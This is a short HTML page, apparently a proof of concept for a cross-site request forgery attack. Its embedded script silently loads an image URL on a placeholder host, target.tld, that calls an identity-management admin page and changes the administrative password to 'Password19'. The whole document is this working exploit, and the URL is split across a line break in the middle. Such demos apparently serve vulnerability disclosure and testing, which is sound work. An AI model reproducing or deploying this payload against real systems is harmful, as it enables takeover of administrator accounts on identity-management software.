<html>
<h1>CSRF attack demo - changes administrative password to 'Password19'</h1>
<script>
var img = new Image();
img.src =
'https://target.tld/idm/admin/changeself.jsp?id=&command=Save&activeControl=&resourceAccounts.password=Password19&resourceAccounts.confirmPassword=Passwo
rd19&resourceAccounts.currentResourceAccounts%5BLighthouse%5D.selected=true';
</script>
</html>